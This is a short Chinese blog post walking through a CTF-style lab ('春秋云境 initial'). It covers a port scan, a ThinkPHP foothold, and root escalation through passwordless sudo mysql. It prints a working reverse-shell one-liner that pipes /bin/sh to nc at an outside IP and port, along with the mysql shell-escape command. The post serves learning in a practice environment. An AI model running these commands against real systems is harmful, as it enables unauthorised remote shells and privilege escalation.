Title image
p1nk's blog



春秋云境 initial

先看看开了哪些端口

1
.\kscan_windows_amd64.exe -t 121.89.198.102 -sV

image-20240620223940085

貌似就80可用

打开网站,熟悉的图标

image-20240620224039887

有可能是spring和tp

默认tp吧

image-20240620224148957

果然

那先getshell吧

image-20240620224516352

www-data权限但有mysql无密码可以利用

1
sudo mysql -e '\! id'
1
2

sudo mysql -e '\! rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 60.205.245.123 5555 >/tmp/f;'

反弹shell

试了很多payload,但是只有这个管用

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 60.205.245.123 5555 >/tmp/f;

拿到root直接找到找flag

1
find / -name flag

image-20240620234003448

传fscan扫内网
image-20240621001741406







内敛而不懦弱 寂静而有力量


© - p1nk的生命线 : 2001 ~ 2025 - Powered by Hexo